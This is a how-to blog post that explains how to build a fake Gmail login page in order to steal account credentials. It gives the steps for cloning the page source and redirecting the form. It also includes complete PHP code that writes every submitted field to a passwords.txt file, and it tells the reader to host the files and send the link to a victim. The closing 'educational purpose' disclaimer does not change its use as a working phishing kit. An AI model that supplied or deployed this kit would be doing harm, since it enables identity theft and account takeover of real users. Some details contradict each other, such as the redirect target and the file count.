How to hack Gmail account with phishing page

How to hack Gmail account with phishing page





Before creating a phishing page, you should first know what is phishing attack. Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging.

Here is a step by step guide will show you how you can make your own GMAIL Phishing (Fake) page easily.

How to create a phishing page? 


Step 1 : Create a HTML page looks similar to Gmail homepage.

1. Go to the Gmail page ,and then right click on the page, you will see the option view page source, click on that.

2. Open the HTML file in Wordpad and find these image tags and change it to like this. This means, you have to download those two images and save it with those names (logo_2x.png to logo.png and avatar_2x to avatar.png) in the same directory/folder.



3. Search for action="https://www.google.com/accounts/ServiceLoginAuth" and replace it withaction="login.php"and save it as index.html.


Step 2: Create a PHP file


1. Open a new notepad copy the below code and paste it with name login.php.

<?php
header("Location: http://www.gmail.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Step 3 : Create a empty .txt (notepad) file with name passwords.txt

Now you have three files 1) index.html , 2) login.php , 3) passwords.txt, 4)logo.png and 5)avatar.png.




Now here comes the method to get password and email address of the victim :

Now upload these files in any free server like 000webhosting , 1freehosting etc.. And now give the url of that page to your victim. And when your victim try to login in to it with the username and password , the page redirects to Facebook and you will see his email and password which was saved inpasswords.txt file.

Or try yourself by installing any server like xampp or wampp server in your PC and run the index.html file via localhost to check it. I have tested the files which works 100%. Look at the below image to check it.

Note : "Phishing" is identity theft. Attempted identity theft is still a crime. This tutorial is for educational purpose. Do at your own risk.


-- 
Yours,
** Bala....